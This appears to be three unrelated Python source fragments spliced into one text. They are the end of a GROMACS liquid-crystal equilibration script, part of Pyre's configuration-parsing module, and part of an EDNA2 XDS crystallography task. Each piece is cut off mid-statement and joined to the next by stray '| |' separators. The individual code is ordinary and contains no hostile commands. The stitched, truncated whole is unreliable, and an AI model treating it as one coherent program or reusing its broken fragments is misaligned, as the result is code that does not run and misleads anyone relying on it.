parser.add_argument('-forces', default=[1000000, 3162, 56, 8, 3, 2, 1, 0], help='Sequence of force constants to'
'apply to ring restraints')
parser.add_argument('-l_nvt', '--length_nvt', default=50, type=int, help='Length of restrained NVT simulations '
'(ps)')
parser.add_argument('-lb', '--length_berendsen', default=5000, type=int, help='Length of simulation using berendsen'
'pressure control')
parser.add_argument('-lpr', '--length_Parrinello_Rahman', default=400000, type=int, help='Length of simulation '
'using Parrinello-Rahman pressure control')
parser.add_argument('--restraint_residue', default='HII', nargs='+', type=str,
help='Name of residue to which ring_restraint atoms belong')
parser.add_argument('--restraint_axis', default='xyz', type=str, help='Axes along which to apply position '
'restraints')
parser.add_argument('--continue_initial_config', default=None, help='Equilibrate energy minimized initial '
'configuration.')
parser.add_argument('-try', '--ntries', default=10, type=int, help='The number of times to try to energy minimize an initial'
'configuration before resorting to scaling + shrinking it.')
return parser
# TODO: make a yaml
class HexagonalPhaseEquilibration:
def __init__(self, build_monomers, mpi=False, nprocesses=4):
self.build_monomers = build_monomers
self.lc = [topology.LC(m) for m in self.build_monomers]
self.gro_name = None
self.top = None
self.mdp = None
self.mpi = mpi
self.nprocesses = nprocesses
def build(self, build_monomer, out, mon_per_col, ncol, radius, p2p, dbwl, pd, nopores=4, seed=False,
mole_fraction=1.):
# TODO: incorporate class-based functionality
# update once build.py is more class-based
build = 'build.py -phase h2 -m %s -c %s -r %s -p %s -n %s -d %s -pd %s -o %s -b' % (mon_per_col, ncol,
radius, p2p, nopores, dbwl, pd, out)
for mon in build_monomer:
build += ' %s' % mon
if type(mole_fraction) is float:
mole_fraction = [mole_fraction]
build += ' -mf'
for mf in mole_fraction:
build += ' %s' % mf
if seed:
build += ' -seed %s' % seed
subprocess.Popen(build.split()).wait()
self.gro_name = out
def generate_input_files(self, ensemble, length, barostat='berendsen', genvel=True, xlink=False, restraints=False,
frames=50, dt=0.002):
# mostly uses defaults for now
nstout = int(length / (dt * frames))
self.mdp = SimulationMdp(self.gro_name, length=length, barostat=barostat, genvel=genvel, restraints=restraints,
xlink=xlink, nstxout=nstout, nstvout=nstout, nstfout=nstout, nstenergy=nstout)
self.mdp.write_em_mdp() # write energy minimization .mdp without asking
if ensemble == 'npt':
self.mdp.write_npt_mdp()
elif ensemble == 'nvt':
self.mdp.write_nvt_mdp()
fix_residues = False
# after restrainded simulation, all residues in output gro have the same number preventing proper labeling
if len(self.build_monomers) > 1: # and not restraints # this condition may provide marginal speedup
fix_residues = True
self.top = SystemTopology(self.gro_name, restraints=restraints, xlink=xlink, fix_residues=fix_residues)
self.top.write_top()
def restrain(self, build_monomer, force, axis, restraint_atoms):
top = RestrainedTopology(self.gro_name, build_monomer, restraint_atoms, com=False)
top.add_position_restraints(axis, [force for _ in range(len(axis))])
top.write_topology()
def shrink_unit_cell(self, start, stop=1, step=0.2):
""" Sequentially energy minimize a structure to a packing structure by isotropically scaling the distance between
monomer head groups
:return:
"""
for i in np.linspace(start - step, stop, int(round((start - stop) / step))):
f = i / (i + step)
self.scale_columns(f)
print('Attempting energy minimization with box lengths %.4f times desired size' % i, end='', flush=True)
nrg = gromacs.simulate(self.mdp.em_mdp_name, self.top.name, self.gro_name,
self.mdp.em_mdp_name.split('.')[0], em_energy=True, verbose=False, mpi=self.mpi,
nprocesses=self.nprocesses, restraints=True)
if nrg >= 0:
print('...Failed. Will shrink slower on next iteration.')
self.gro_name = 'scaled_%.4f.gro' % (i + step)
self.shrink_unit_cell(i + step, i, step / 2) # reduce shrink rate
else:
print('Running short NVT simulation...', end='', flush=True)
self.gro_name = self.mdp.em_mdp_name.split('.')[0] + '.gro'
self.simulate(self.mdp.nvt_mdp_name, self.top.name, 'nvt_%.4f' % i, restrained=True)
print('...Success!')
cp = 'cp em.gro scaled_%.4f.gro' % i
p = subprocess.Popen(cp.split())
p.wait()
def scale_columns(self, scale_factor):
pore_defining_atoms = [self.lc[i].pore_defining_atoms for i in range(len(self.lc))]
t = md.load(self.gro_name)
resnames = [a.residue.name for a in t.topology.atoms]
ids = [a.name for a in t.topology.atoms]
indices = [[] for _ in range(len(self.lc))]
monomers = {l.name: i for i, l in enumerate(self.lc)}
for a in t.topology.atoms:
try:
mon = monomers[a.residue.name]
if a.name in pore_defining_atoms[mon]:
indices[mon].append(a.index)
except KeyError:
pass
mass = [[self.lc[i].mass[a] for a in self.lc[i].LC_names if a in pda]
for i, pda in enumerate(pore_defining_atoms)]
com = []
for m in range(len(monomers.values())):
com.append(physical.center_of_mass(t.xyz[:, indices[m], :], mass[m]))
# rebuild unit cell with scaled center-of-mass z coordinates
nres = [len(indices[i]) // len(pore_defining_atoms[i]) for i in range(len(self.lc))]
ndx = 0
n = [0, 0]
for i in range(sum(nres)):
mon = monomers[resnames[ndx]]
end = ndx + self.lc[mon].natoms
ref_z = com[mon][0, n[mon], 2]
scaled_com = ref_z * scale_factor
t.xyz[0, ndx:end, 2] += (scaled_com - ref_z)
ndx = end # - self.lc[mon].no_ions -- haven't tested
n[mon] += 1
ucell = t.unitcell_vectors[0, ...]
ucell[2, 2] *= scale_factor
self.gro_name = 'scaled.gro'
file_rw.write_gro_pos(t.xyz[0, ...], self.gro_name, ids=ids, res=resnames, ucell=ucell)
def simulate(self, mdp, top, out, restrained=False):
if self.mpi:
gmx = "mpirun -np %s gmx_mpi" % self.nprocesses
else:
gmx = "gmx"
grompp = "%s grompp -f %s -p %s -c %s -o %s" % (gmx, mdp, top, self.gro_name, out)
if restrained:
grompp += ' -r %s' % self.gro_name
p = subprocess.Popen(grompp.split())
p.wait()
mdrun = "%s mdrun -v -deffnm %s" % (gmx, out)
p = subprocess.Popen(mdrun.split())
p.wait()
self.gro_name = out + '.gro'
def check_energy(logname='em.log'):
nrg = 1
with open('%s' % logname) as f:
for line in f:
if line.count("Potential Energy") == 1:
nrg = float(line.split()[3])
return nrg
if __name__ == "__main__":
# TODO: replace equil.simulate() with gromacs.simulate()
args = initialize().parse_args()
os.environ["GMX_MAXBACKUP"] = "-1" # stop GROMACS from making backups
equil = HexagonalPhaseEquilibration(args.build_monomer, mpi=args.mpi, nprocesses=args.nproc)
lc = [topology.LC(mon) for mon in args.build_monomer]
atoms = [l.pore_defining_atoms for l in lc]
if args.continue_initial_config is None:
# initial build
equil.build(args.build_monomer, args.initial, args.monomers_per_column, args.ncolumns, args.pore_radius, args.p2p,
args.dbwl, args.parallel_displaced, nopores=args.nopores, seed=args.random_seed, mole_fraction=args.mol_frac)
# generate input files once
equil.restrain(args.build_monomer, args.forces[0], args.restraint_axis, atoms)
equil.generate_input_files('nvt', args.length_nvt, restraints=args.restraint_residue)
# try energy minimizing
nrg = gromacs.simulate(equil.mdp.em_mdp_name, equil.top.name, equil.gro_name, 'em', em_energy=True,
verbose=True, mpi=equil.mpi, nprocesses=4, restraints=True)
try_ = 0 # try rebuilding the system ntries times to see if we get any working configs
while nrg > 0 and try_ < args.ntries: # rebuild if that doesn't work
print('Try # %d' % (try_ + 1))
equil.build(args.build_monomer, args.initial, args.monomers_per_column, args.ncolumns, args.pore_radius,
args.p2p,
args.dbwl, args.parallel_displaced, nopores=args.nopores, seed=args.random_seed,
mole_fraction=args.mol_frac)
equil.restrain(args.build_monomer, args.forces[0], args.restraint_axis, atoms)
nrg = gromacs.simulate('em.mdp', equil.top.name, equil.gro_name, 'em', em_energy=True,
verbose=False, mpi=equil.mpi, nprocesses=4, restraints=True)
print(nrg)
try_ += 1
if nrg > 0: # if | |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import dataclasses
import glob
import json
import logging
import os
import shutil
import site
import subprocess
import sys
from dataclasses import dataclass, field
from logging import Logger
from pathlib import Path
from typing import (
Any,
Dict,
Iterable,
List,
Optional,
Sequence,
Set,
Type,
TypeVar,
Union,
)
import psutil
from .. import command_arguments, dataclasses_merge, find_directories
from ..filesystem import expand_global_root, expand_relative_path
from ..find_directories import (
BINARY_NAME,
CONFIGURATION_FILE,
get_relative_local_root,
LOCAL_CONFIGURATION_FILE,
LOG_DIRECTORY,
)
from . import (
exceptions,
ide_features as ide_features_module,
platform_aware,
python_version as python_version_module,
search_path as search_path_module,
shared_memory as shared_memory_module,
site_packages,
unwatched,
)
LOG: Logger = logging.getLogger(__name__)
T = TypeVar("T")
def _get_optional_value(source: Optional[T], default: T) -> T:
return source if source is not None else default
def _expand_and_get_existent_ignore_all_errors_path(
ignore_all_errors: Iterable[str], project_root: str
) -> List[str]:
expanded_ignore_paths = []
for path in ignore_all_errors:
expanded = glob.glob(expand_global_root(path, global_root=project_root))
if not expanded:
expanded_ignore_paths.append(path)
else:
expanded_ignore_paths.extend(expanded)
paths = []
for path in expanded_ignore_paths:
if os.path.exists(path):
paths.append(path)
else:
LOG.warning(f"Nonexistent paths passed in to `ignore_all_errors`: `{path}`")
if _is_glob(path):
LOG.warning(
f"Within `ignore_all_errors`, no matches found to glob pattern: `{path}`"
)
else:
LOG.warning(
f"Nonexistent paths passed in to `ignore_all_errors`: `{path}`"
)
return paths
def _is_glob(path: str) -> bool:
if ("*" in path) or ("?" in path) or (("[" in path) and ("]" in path)):
return True
return False
@dataclasses.dataclass
class ExtensionElement:
suffix: str
include_suffix_in_module_qualifier: bool
def command_line_argument(self) -> str:
options = ""
if self.include_suffix_in_module_qualifier:
options = "$" + "include_suffix_in_module_qualifier"
return self.suffix + options
@staticmethod
def from_json(json: Union[str, Dict[str, Union[str, bool]]]) -> "ExtensionElement":
if isinstance(json, str):
return ExtensionElement(
suffix=json, include_suffix_in_module_qualifier=False
)
elif isinstance(json, dict):
include_suffix_in_module_qualifier = False
if "include_suffix_in_module_qualifier" in json:
value = json["include_suffix_in_module_qualifier"]
if isinstance(value, bool):
include_suffix_in_module_qualifier = value
if "suffix" in json:
suffix = json["suffix"]
if isinstance(suffix, str):
return ExtensionElement(
suffix=suffix,
include_suffix_in_module_qualifier=include_suffix_in_module_qualifier,
)
raise exceptions.InvalidConfiguration(f"Invalid extension element: {json}")
def get_default_site_roots() -> List[str]:
try:
return [site.getusersitepackages()] + site.getsitepackages()
except AttributeError:
# There are a few Python versions that ship with a broken venv,
# where `getsitepackages` is not available.
LOG.warning(
"Either `site.getusersitepackages()` or `site.getsitepackages()` "
+ "is not available in your virtualenv. This is a known virtualenv "
+ 'bug and as a workaround please explicitly specify `"site_root"` '
+ "in your Pyre configuration."
)
return []
@dataclasses_merge.dataclass_merge
@dataclass(frozen=True)
class PartialConfiguration:
binary: Optional[str] = None
buck_mode: Optional[platform_aware.PlatformAware[str]] = field(
default=None,
metadata={"merge_policy": platform_aware.PlatformAware.merge_optional},
)
do_not_ignore_errors_in: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
dot_pyre_directory: Optional[Path] = None
excludes: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
extensions: Sequence[ExtensionElement] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
ide_features: Optional[ide_features_module.IdeFeatures] = field(
default=None,
metadata={"merge_policy": ide_features_module.IdeFeatures.merge_optional},
)
ignore_all_errors: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
isolation_prefix: Optional[str] = None
logger: Optional[str] = None
number_of_workers: Optional[int] = None
oncall: Optional[str] = None
other_critical_files: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
pysa_version_hash: Optional[str] = None
python_version: Optional[python_version_module.PythonVersion] = None
search_path: Sequence[search_path_module.RawElement] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
shared_memory: shared_memory_module.SharedMemory = (
shared_memory_module.SharedMemory()
)
site_package_search_strategy: Optional[site_packages.SearchStrategy] = None
site_roots: Optional[Sequence[str]] = None
source_directories: Optional[Sequence[search_path_module.RawElement]] = field(
default=None,
metadata={"merge_policy": dataclasses_merge.Policy.RAISE_WHEN_OVERWRITTEN},
)
strict: Optional[bool] = None
taint_models_path: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
targets: Optional[Sequence[str]] = field(
default=None,
metadata={"merge_policy": dataclasses_merge.Policy.RAISE_WHEN_OVERWRITTEN},
)
typeshed: Optional[str] = None
unwatched_dependency: Optional[unwatched.UnwatchedDependency] = None
use_buck2: Optional[bool] = None
version_hash: Optional[str] = None
@staticmethod
def _get_depreacted_map() -> Dict[str, str]:
return {"do_not_check": "ignore_all_errors"}
@staticmethod
def _get_extra_keys() -> Set[str]:
return {
"create_open_source_configuration",
"saved_state",
"stable_client",
"taint_models_path",
"unstable_client",
}
@staticmethod
def from_command_arguments(
arguments: command_arguments.CommandArguments,
) -> "PartialConfiguration":
strict: Optional[bool] = True if arguments.strict else None
source_directories = [
search_path_module.SimpleRawElement(element)
for element in arguments.source_directories
] or None
targets: Optional[List[str]] = (
arguments.targets if len(arguments.targets) > 0 else None
)
python_version_string = arguments.python_version
ide_features = (
ide_features_module.IdeFeatures(
hover_enabled=arguments.enable_hover,
go_to_definition_enabled=arguments.enable_go_to_definition,
find_symbols_enabled=arguments.enable_find_symbols,
)
if arguments.enable_hover is not None
or arguments.enable_go_to_definition is not None
else None
)
return PartialConfiguration(
binary=arguments.binary,
buck_mode=platform_aware.PlatformAware.from_json(
arguments.buck_mode, "buck_mode"
),
do_not_ignore_errors_in=arguments.do_not_ignore_errors_in,
dot_pyre_directory=arguments.dot_pyre_directory,
excludes=arguments.exclude,
extensions=[],
ide_features=ide_features,
ignore_all_errors=[],
isolation_prefix=arguments.isolation_prefix,
logger=arguments.logger,
number_of_workers=arguments.number_of_workers,
oncall=None,
other_critical_files=[],
pysa_version_hash=None,
python_version=(
python_version_module.PythonVersion.from_string(python_version_string)
if python_version_string is not None
else None
),
search_path=[
search_path_module.SimpleRawElement(element)
for element in arguments.search_path
],
shared_memory=shared_memory_module.SharedMemory(
heap_size=arguments.shared_memory_heap_size,
dependency_table_power=arguments.shared_memory_dependency_table_power,
hash_table_power=arguments.shared_memory_hash_table_power,
),
site_package_search_strategy=None,
site_roots=None,
source_directories=source_directories,
strict=strict,
taint_models_path=[],
targets=targets,
typeshed=arguments.typeshed,
unwatched_dependency=None,
use_buck2=arguments.use_buck2,
version_hash=None,
)
@staticmethod
def from_string(contents: str) -> "PartialConfiguration":
def is_list_of_string(elements: object) -> bool:
return isinstance(elements, list) and all(
isinstance(element, str) for element in elements
)
def ensure_option_type(
json: Dict[str, Any], name: str, expected_type: Type[T]
) -> Optional[T]:
result = json.pop(name, None)
if result is None:
return None
elif isinstance(result, expected_type):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to have type "
f"{expected_type} but got: `{result}`."
)
def ensure_optional_string_or_string_dict(
json: Dict[str, Any], name: str
) -> Optional[Union[Dict[str, str], str]]:
result = json.pop(name, None)
if result is None:
return None
elif isinstance(result, str):
return result
elif isinstance(result, Dict):
for value in result.values():
if not isinstance(value, str):
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a "
+ f"dict of strings but got `{result}`."
)
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a string or a "
+ f"dict of strings but got `{result}`."
)
def ensure_optional_string_list(
json: Dict[str, Any], name: str
) -> Optional[List[str]]:
result = json.pop(name, None)
if result is None:
return None
elif is_list_of_string(result):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a list of "
+ f"strings but got `{result}`."
)
def ensure_string_list(
json: Dict[str, Any], name: str, allow_single_string: bool = False
) -> List[str]:
result = json.pop(name, [])
if allow_single_string and isinstance(result, str):
result = [result]
if is_list_of_string(result):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a list of "
+ f"strings but got `{result}`."
)
def ensure_list(json: Dict[str, object], name: str) -> List[object]:
result = json.pop(name, [])
if isinstance(result, list):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a list but got `{result}`."
)
try:
configuration_json = json.loads(contents)
dot_pyre_directory = ensure_option_type(
configuration_json, "dot_pyre_directory", str
)
search_path_json = configuration_json.pop("search_path", [])
if isinstance(search_path_json, list):
search_path = [
search_path_module.create_raw_element(json)
for json in search_path_json
]
else:
search_path = [search_path_module.create_raw_element(search_path_json)]
python_version_json = configuration_json.pop("python_version", None)
if python_version_json is None:
python_version = None
elif isinstance(python_version_json, str):
python_version = python_version_module.PythonVersion.from_string(
python_version_json
)
else:
raise exceptions.InvalidConfiguration(
"Expect python version to be a string but got"
+ f"'{python_version_json}'"
)
shared_memory_json = ensure_option_type(
configuration_json, "shared_memory", dict
)
if shared_memory_json is None:
shared_memory = shared_memory_module.SharedMemory()
else:
shared_memory = shared_memory_module.SharedMemory(
heap_size=ensure_option_type(shared_memory_json, "heap_size", int),
dependency_table_power=ensure_option_type(
shared_memory_json, "dependency_table_power", int
),
hash_table_power=ensure_option_type(
shared_memory_json, "hash_table_power", int
),
)
for unrecognized_key in shared_memory_json:
LOG.warning(f"Unrecognized configuration item: {unrecognized_key}")
source_directories_json = ensure_option_type(
configuration_json, "source_directories", list
)
if isinstance(source_directories_json, list):
source_directories = [
search_path_module.create_raw_element(json)
for json in source_directories_json
]
else:
source_directories = None
site_package_search_strategy_json = ensure_option_type(
configuration_json, "site_package_search_strategy", str
)
if site_package_search_strategy_json is None:
site_package_search_strategy = None
else:
site_package_search_strategy = site_packages.SearchStrategy.from_string(
site_package_search_strategy_json
)
if site_package_search_strategy is None:
raise exceptions.InvalidConfiguration(
"Invalid value for `site_package_search_strategy`: "
f"{site_package_search_strategy_json}. Available choices: "
f"{[str(x) for x in site_packages.SearchStrategy]}."
)
ide_features_json = ensure_option_type(
configuration_json, "ide_features", dict
)
if ide_features_json is None:
ide_features = None
else:
ide_features = ide_features_module.IdeFeatures.create_from_json(
ide_features_json
)
unwatched_dependency_json = ensure_option_type(
configuration_json, "unwatched_dependency", dict
)
if unwatched_dependency_json is None:
unwatched_dependency = None
else:
unwatched_dependency = unwatched.UnwatchedDependency.from_json(
unwatched_dependency_json
)
partial_configuration = PartialConfiguration(
binary=ensure_option_type(configuration_json, "binary", str),
buck_mode=platform_aware.PlatformAware.from_json(
ensure_optional_string_or_string_dict(
configuration_json, "buck_mode"
),
"buck_mode",
),
do_not_ignore_errors_in=ensure_string_list(
configuration_json, "do_not_ignore_errors_in"
),
dot_pyre_directory=Path(dot_pyre_directory)
if dot_pyre_directory is not None
else None,
excludes=ensure_string_list(
configuration_json, "exclude", allow_single_string=True
),
extensions=[
# pyre-fixme[6]: we did not fully verify the type of `json`
ExtensionElement.from_json(json)
for json in ensure_list(configuration_json, "extensions")
],
ide_features=ide_features,
ignore_all_errors=ensure_string_list(
configuration_json, "ignore_all_errors"
),
isolation_prefix=ensure_option_type(
configuration_json, "isolation_prefix", str
),
logger=ensure_option_type(configuration_json, "logger", str),
number_of_workers=ensure_option_type(
configuration_json, "workers", int
),
oncall=ensure_option_type(configuration_json, "oncall", str),
other_critical_files=ensure_string_list(
configuration_json, "critical_files"
),
pysa_version_hash=ensure_option_type(
configuration_json, "pysa_version", str
),
python_version=python_version,
search_path=search_path,
shared_memory=shared_memory,
site_package_search_strategy=site_package_search_strategy,
site_roots=ensure_optional_string_list(
configuration_json, "site_roots"
),
source_directories=source_directories,
strict=ensure_option_type(configuration_json, "strict", bool),
taint_models_path=ensure_string_list(
configuration_json, "taint_models_path", allow_single_string=True
),
targets=ensure_optional_string_list(configuration_json, "targets"),
typeshed=ensure_option_type(configuration_json, "typeshed", str),
unwatched_dependency=unwatched_dependency,
use_buck2=ensure_option_type(configuration_json, "use_buck2", bool),
version_hash=ensure_option_type(configuration_json, "version", str),
)
# Check for deprecated and unused keys
for (
deprecated_key,
replacement_key,
) in PartialConfiguration._get_depreacted_map().items():
if deprecated_key in configuration_json:
configuration_json.pop(deprecated_key)
LOG.warning(
f"Configuration file uses deprecated item `{deprecated_key}`. "
f"Please migrate to its replacement `{replacement_key}`"
)
extra_keys = PartialConfiguration._get_extra_keys()
for unrecognized_key in configuration_json:
if unrecognized_key | |
#
# Copyright (c) European Synchrotron Radiation Facility (ESRF)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__authors__ = ["<NAME>"]
__license__ = "MIT"
__date__ = "20/04/2020"
# Corresponding EDNA code:
# https://github.com/olofsvensson/edna-mx
# mxPluginExec/plugins/EDPluginGroupXDS-v1.0/plugins/EDPluginXDSv1_0.py
# mxPluginExec/plugins/EDPluginGroupXDS-v1.0/plugins/EDPluginXDSIndexingv1_0.py
import os
import math
import shutil
import numpy as np
from edna2.tasks.AbstractTask import AbstractTask
from edna2.utils import UtilsImage
from edna2.utils import UtilsConfig
from edna2.utils import UtilsLogging
from edna2.utils import UtilsDetector
from edna2.utils import UtilsSymmetry
logger = UtilsLogging.getLogger()
class XDSTask(AbstractTask):
"""
Common base class for all XDS tasks
"""
def run(self, inData):
commandLine = 'xds_par'
listXDS_INP = self.generateXDS_INP(inData)
self.writeXDS_INP(listXDS_INP, self.getWorkingDirectory())
self.setLogFileName('xds.log')
self.runCommandLine(commandLine, listCommand=[])
# Work in progress!
outData = self.parseXDSOutput(self.getWorkingDirectory())
return outData
@staticmethod
def generateImageLinks(inData, workingDirectory=None):
listImageLink = []
firstSubWedge = inData["subWedge"][0]
firstImagePath = firstSubWedge["image"][0]["path"]
prefix = UtilsImage.getPrefix(firstImagePath)
suffix = UtilsImage.getSuffix(firstImagePath)
template = "%s_xdslink_?????.%s" % (prefix, suffix)
xdsLowestImageNumberGlobal = 1
# First we have to find the smallest goniostat rotation axis start:
oscillationStartMin = 0
# for subWedge in inData["subWedge"]:
# goniostat = subWedge["experimentalCondition"]["goniostat"]
# oscillationStart = goniostat["rotationAxisStart"]
# if oscillationStartMin is None or \
# oscillationStartMin > oscillationStart:
# oscillationStartMin = oscillationStart
# Loop through the list of sub wedges
for subWedge in inData["subWedge"]:
imageList = subWedge["image"]
xsDataGoniostat = subWedge["experimentalCondition"]["goniostat"]
oscillationStart = xsDataGoniostat["rotationAxisStart"]
oscillationRange = xsDataGoniostat["oscillationWidth"]
# First find the lowest and highest image numbers
lowestImageNumber = None
for dictImage in imageList:
imageNumber = dictImage["number"]
if lowestImageNumber is None or imageNumber < lowestImageNumber:
lowestImageNumber = imageNumber
# Loop through the list of images
lowestXDSImageNumber = None
highestXDSImageNumber = None
for dictImage in imageList:
imageNumber = dictImage["number"]
imageOscillationStart = \
oscillationStart + (imageNumber - lowestImageNumber) * oscillationRange
# if xdsLowestImageNumberGlobal is None:
# xdsLowestImageNumberGlobal = 1 + int((imageOscillationStart - oscillationStartMin) / oscillationRange)
xdsImageNumber = xdsLowestImageNumberGlobal + \
int((imageOscillationStart - oscillationStartMin) / oscillationRange)
print(xdsImageNumber, imageOscillationStart, oscillationStartMin, oscillationRange)
sourcePath = dictImage["path"]
target = "%s_xdslink_%05d.%s" % (prefix, xdsImageNumber, suffix)
print([sourcePath, target])
listImageLink.append([sourcePath, target])
if workingDirectory is not None:
os.symlink(sourcePath, target)
if lowestXDSImageNumber is None or \
lowestXDSImageNumber > xdsImageNumber:
lowestXDSImageNumber = xdsImageNumber
if highestXDSImageNumber is None or \
highestXDSImageNumber < xdsImageNumber:
highestXDSImageNumber = xdsImageNumber
dictImageLinks = {
"imageLink": listImageLink,
"dataRange": [lowestXDSImageNumber, highestXDSImageNumber],
"template": template
}
return dictImageLinks
@staticmethod
def generateXDS_INP(inData):
"""
This method creates a list of XDS.INP commands
"""
# Take the first sub webge in input as reference
firstSubwedge = inData["subWedge"][0]
listImage = firstSubwedge['image']
image = listImage[0]
experimentalCondition = firstSubwedge['experimentalCondition']
detector = experimentalCondition['detector']
dictXDSDetector = XDSTask.getXDSDetector(detector)
beam = experimentalCondition['beam']
goniostat = experimentalCondition['goniostat']
distance = round(detector['distance'], 3)
wavelength = round(beam['wavelength'], 3)
oscRange = goniostat['oscillationWidth']
startAngle = goniostat['rotationAxisStart'] - int(goniostat['rotationAxisStart'])
dataRange = '1 360'
listXDS_INP = [
'OVERLOAD=10048500',
'DIRECTION_OF_DETECTOR_X-AXIS={0}'.format(UtilsConfig.get('XDSTask', 'DIRECTION_OF_DETECTOR_X-AXIS')),
'DIRECTION_OF_DETECTOR_Y-AXIS={0}'.format(UtilsConfig.get('XDSTask', 'DIRECTION_OF_DETECTOR_Y-AXIS')),
'ROTATION_AXIS={0}'.format(UtilsConfig.get('XDSTask', 'ROTATION_AXIS')),
'INCIDENT_BEAM_DIRECTION={0}'.format(UtilsConfig.get('XDSTask', 'INCIDENT_BEAM_DIRECTION')),
'NX={0} NY={1} QX={2} QY={2}'.format(
dictXDSDetector["nx"], dictXDSDetector["ny"], dictXDSDetector["pixel"]),
'ORGX={0} ORGY={1}'.format(
dictXDSDetector["orgX"], dictXDSDetector["orgY"]),
'DETECTOR={0} MINIMUM_VALID_PIXEL_VALUE={1} OVERLOAD={2}'.format(
dictXDSDetector["name"],
dictXDSDetector["minimumValidPixelValue"],
dictXDSDetector["overload"]
),
'SENSOR_THICKNESS={0}'.format(
dictXDSDetector["sensorThickness"]),
'TRUSTED_REGION={0} {1}'.format(
dictXDSDetector["trustedRegion"][0],
dictXDSDetector["trustedRegion"][1]
)]
# for trustedRegion in dictXDSDetector["untrustedRectangle"]:
# listXDS_INP.append('UNTRUSTED_RECTANGLE={0} {1} {2} {3}'.format(
# trustedRegion[0], trustedRegion[1],
# trustedRegion[2],trustedRegion[3]
# ))
listXDS_INP += [
'DETECTOR_DISTANCE={0}'.format(distance),
'X-RAY_WAVELENGTH={0}'.format(wavelength),
'OSCILLATION_RANGE={0}'.format(oscRange),
'STARTING_ANGLE={0}'.format(startAngle),
'INDEX_QUALITY= 0.25'
]
if "spaceGroupNumber" in inData:
spaceGroupNumber = inData["spaceGroupNumber"]
cell = inData["cell"]
unitCellConstants = "{a} {b} {c} {alpha} {beta} {gamma}".format(**cell)
listXDS_INP += [
'SPACE_GROUP_NUMBER={0}'.format(spaceGroupNumber),
'UNIT_CELL_CONSTANTS={0}'.format(unitCellConstants)
]
return listXDS_INP
@staticmethod
def createSPOT_XDS(listDozorSpotFile, oscRange):
"""
implicit none
integer nmax
parameter(nmax=10000000)
real*4 x(3),j
integer n,i,k
real*4 xa(nmax,3),ja(nmax)
logical new
c
n=0
do while(.true.)
read(*,*,err=1,end=1)x,j
new = .true.
do i = n,1,-1
if (abs(xa(i,3)-x(3)) .gt. 20.0 ) goto 3
do k = 1,2
if (abs(x(k)-xa(i,k)) .gt. 6.0) goto 2
enddo
new = .false.
xa(i,:)=(xa(i,:)*ja(i)+x*j)/(ja(i)+j)
ja(i)=ja(i)+j
2 continue
enddo
3 if (new) then
n=n+1
xa(n,:)=x
ja(n)=j
endif
enddo
1 continue
do i=1,n
write(*,*)xa(i,:), ja(i)
enddo
end
"""
listSpotXds = []
n = 0
firstFrame = True
for dozorSpotFile in listDozorSpotFile:
# Read the file
with open(str(dozorSpotFile)) as f:
dozorLines = f.readlines()
omega = float(dozorLines[2].split()[1])
frame = int((omega - oscRange/2)/oscRange) + 1
frame = frame % 360
for dozorLine in dozorLines[3:]:
new = True
listValues = dozorLine.split()
n, xPos, yPos, intensity, sigma = list(map(float, listValues))
# Subtracting 1 from X and Y: this is because for dozor the upper left pixel in the image is (1,1),
# whereas for the rest of the world it is (0,0)
xPos = xPos - 1
yPos = yPos - 1
index = 0
for spotXds in listSpotXds:
frameOld = spotXds[2]
if abs(frameOld - frame) > 20:
break
xPosOld = spotXds[0]
yPosOld = spotXds[1]
intensityOld = spotXds[3]
if abs(xPosOld - xPos) <= 6 and abs(yPosOld - yPos) <= 6:
new = False
intensityNew = intensity + intensityOld
xPosNew = (xPosOld*intensityOld + xPos*intensity) / intensityNew
yPosNew = (yPosOld*intensityOld + yPos*intensity) / intensityNew
listSpotXds[index] = [xPosNew, yPosNew, frameOld, intensityNew]
index += 1
if new:
spotXds = [xPos, yPos, frame, intensity]
listSpotXds.append(spotXds)
strSpotXds = ''
for spotXds in listSpotXds:
strSpotXds += '{0:13.6f}{1:17.6f}{2:17.8f}{3:17.6f} \n'.format(*spotXds)
return strSpotXds
@staticmethod
def writeSPOT_XDS(listDozorSpotFile, oscRange, workingDirectory):
spotXds = XDSTask.createSPOT_XDS(listDozorSpotFile, oscRange)
filePath = workingDirectory / 'SPOT.XDS'
with open(str(filePath), 'w') as f:
f.write(spotXds)
def writeXDS_INP(self, listXDS_INP, workingDirectory):
fileName = 'XDS.INP'
filePath = workingDirectory / fileName
with open(str(filePath), 'w') as f:
for line in listXDS_INP:
